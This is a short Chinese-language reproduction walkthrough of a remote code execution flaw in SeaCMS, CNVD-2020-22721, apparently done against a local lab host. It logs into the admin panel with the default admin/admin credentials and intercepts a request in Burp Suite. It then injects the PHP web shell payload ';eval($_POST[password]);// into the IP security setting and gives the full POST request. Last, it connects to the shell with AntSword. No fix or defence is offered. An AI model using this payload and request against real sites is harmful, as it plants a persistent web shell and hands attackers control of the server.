WEB漏洞之：海洋CMS代码执行（CNVD-2020-22721）

漏洞环境说明：
海洋CMS是一款视频类cms，本次复现海洋cms远程命令执行漏洞 漏洞编号：CNVD-2020-22721
首先登录后台地址为//manager 默认用户名和密码admin。

进入后台之后，找到IP安全设置选项 目录为：admin_ip.php

打开Burp Suite工具，开始拦截数据包。
结尾添加webshell

";eval($_POST[password]);//

POST数据包

POST http://192.168.17.133:54935/manager/admin_ip.php?action=set HTTP/1.1
Host: 192.168.17.133:54935
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.17.133:54935
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.17.133:54935/manager/admin_ip.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h619avhk72f9uqmvih79nv2695
Connection: close

v=0&ip=+127.0.0.1";eval($_POST[password]);//

使用蚁剑连接。


至此漏洞复现完成。